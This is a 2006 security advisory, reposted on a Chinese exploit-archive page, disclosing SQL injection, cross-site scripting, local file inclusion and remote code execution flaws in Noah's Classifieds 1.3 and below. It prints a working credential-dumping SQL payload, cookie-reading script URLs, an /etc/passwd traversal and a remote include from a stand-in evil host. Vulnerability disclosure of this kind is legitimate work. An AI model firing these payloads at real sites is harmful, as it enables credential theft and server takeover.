首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Noah's Classifieds versions 1.3 and below remote code execution
来源:http://www.kapda.ir 作者:trueend5 发布时间:2006-02-26  

KAPDA New advisory

Vendor: http://classifieds.phpoutsourcing.com
Vulnerable: Noah`s classifieds 1.3 and below
(classifieds component for mambo also may be affected)
Bug: Path Disclosure,Sql Injection,XSS,Local file
inclusion,Remote code execution
Exploitation: Remote with browser
Exploit:available

Description:
--------------------
Noah' Classifieds is a general purpose application
that allows you to set up as many ad categories as you
want specifying custom fields for each of them.

Vulnerabilities:
--------------------

Path disclosure (direct access to include files)

http://example.com/classifieds/gorum/category.php

--------------------------
--------------------------

Sql Injection: (search tool, HTTP method:POST,
condition: mysql user with file privilege)

kapda%')))/**/UNION/**/SELECT/**/1,1,1,name,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,password/**/INTO/**/OUTFILE/**/'/installation_path/lang/result.text'/**/FROM/**/classifieds_classifiedsuser#

--------------------------
--------------------------

Cross site scripting

1-
http://example.com/classifieds/index.php?inf=%3Cscript%3Ealert(document.cookie)%3C/script%3E

/gorum/gorumlib.php
if( isset($HTTP_GET_VARS["inf"]) )
$infoText=$HTTP_GET_VARS["inf"];
$sApp=$init->showApp();
$s.=$globHtmlHead;//fontos, hogy felulirhato
legyen az app-ban

---
2-
http://example.com/classifieds/index.php?upperTemplate=%3Cscript%3Ealert(document.cookie)%3C/script%3E
(condition:rgister_globals=On)

--------------------------
--------------------------

Local file inclusion (condition: magic_quotes_gpc=Off
For none php files )

http://example.com/classifieds/index.php?otherTemplate=/../../../etc/passwd%00

/include.php
if (isset($otherTemplate)) {
include("./template$otherTemplate.php");
}
else include("./template.php");

--------------------------
--------------------------

Remote code execution (condition: register_globals=On)

http://example.com/classifieds/index.php?lowerTemplate=http://evilsite.com/evilfile.php


/gorum/constants.php
if (!isset($upperTemplate)) $upperTemplate =
"<body>\n";
if (!isset($lowerTemplate)) $lowerTemplate =
"</body>";

/gorum/gorumlib.php
if (ereg("\.php$",$upperTemplate)) {//just check
$ret=@fopen($upperTemplate,"r");
if (!$ret) {
$infoText =
sprintf($lll["incl_header_err"],$upperTemplate);
}
@fclose($f);
}
if (ereg("\.php$",$lowerTemplate)) {//just check
$ret=@fopen($lowerTemplate,"r");
if (!$ret) {
if (!isset($infoText)) $infoText="";

$infoText.="<br>".sprintf($lll["incl_footer_err"],$lowerTemplate);
}
@fclose($f);
}
.
.
.
$upperTemplate=trim($upperTemplate);
if (ereg("\.php$",$upperTemplate)) {
$ret=@include($upperTemplate);
}
else $s.="$upperTemplate\n";
$lowerTemplate=trim($lowerTemplate);

$s.=$sApp;
if (ereg("\.php$",$lowerTemplate))
$ret=@include($lowerTemplate);
else $s.="$lowerTemplate\n";

}

More details with Exploit
---------
http://www.kapda.ir/advisory-268.html
In Farsi: http://irannetjob.com/content/view/198/28/

Solution:
---------
There is no vendor supplied patch for this issue.

>From Vendor`s website:
"Currently, we are completely overloaded with our
running projects,
and we don't have enough time to deal with our free
products.
The further development and support of Noah's
Classifieds is therefore suspended.
Thank you for the understanding and please forgive us
that we don't responding to the emails."

Credit :
---------
Discovered & released by trueend5 (trueend5 kapda ir)
Security Science Researchers Institute Of Iran
[http://www.KAPDA.ir]


__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mozilla Thunderbird : Remote C
·PHPNuke versions 7.8 and below
·Apple Mac OS X / Safari __MACO
·SCO UnixWare ptrace Call Binar
·Microsoft Windows Media Player
·ArGoSoft FTP Server Remote Buf
·PHPKit <= v.1.6.1 release 2
·Local privilege escalation exp
·Microsoft Color Management Mod
·iGENUS WebMail <= 2.0.2 rem
·Microsoft Windows Media Player
·Microsoft Windows Plug and Pla
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved